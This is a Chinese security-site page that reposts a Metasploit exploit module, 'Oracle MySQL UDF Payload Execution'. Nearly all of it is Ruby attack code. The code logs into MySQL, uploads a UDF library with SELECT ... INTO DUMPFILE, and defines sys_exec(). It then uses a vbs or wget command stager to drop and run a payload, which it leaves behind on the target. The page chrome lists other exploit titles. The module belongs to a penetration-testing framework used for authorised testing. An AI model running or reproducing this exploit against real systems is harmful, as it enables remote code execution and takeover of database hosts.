首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle MySQL UDF Payload Execution
来源:metasploit.com 作者:todb 发布时间:2017-12-25  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Oracle MySQL UDF Payload Execution',
        'Description'    => %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... into DUMPFILE method of binary injection. On
          default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
          permissions not enforced, and the MySQL service runs as LocalSystem.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
          and sys_exec() functions.
        },
        'Author'         =>
          [
            'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
            'todb', # this Metasploit module
            'h00die' # linux addition
          ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            # Bernardo's work with cmd exec via udf
            [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
          ],
        'Platform'       => ['win', 'linux'],
        'Targets'        =>
          [
            [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
            [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
    ))
    register_options(
      [
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login_and_get_sys_exec
    m = mysql_login(username,password,'mysql')
    return if not m
    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      mysql_add_sys_exec
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end

    return m
  end

  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  def exploit
    m = login_and_get_sys_exec()

    if not m
      return
    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else
      if @mysql_sys_exec_available
        execute_cmdstager({:linemax => 1500, :nodelete => true})
        handler
      else
        print_status("MySQL function sys_exec() not available")
        return
      end
    end
    disconnect
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Trend Micro Smart Protection S
·GetGo Download Manager 5.3.0.2
·COMTREND ADSL Router CT-5367 -
·Xbox 360 Aurora 0.6b Default C
·Sendroid < 6.5.0 - SQL Injecti
·Netcore / Netis Routers - UDP
·Fortinet FortiGate 4.x < 5.0.7
·Telesquare SKT LTE Router SDT-
·Technicolor DPC3928SL - SNMP A
·SysGauge Server 3.6.18 - Denia
·DotNetNuke DreamSlider 01.01.0
·Cisco IOS 12.2 < 12.4 / 15.0 <
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved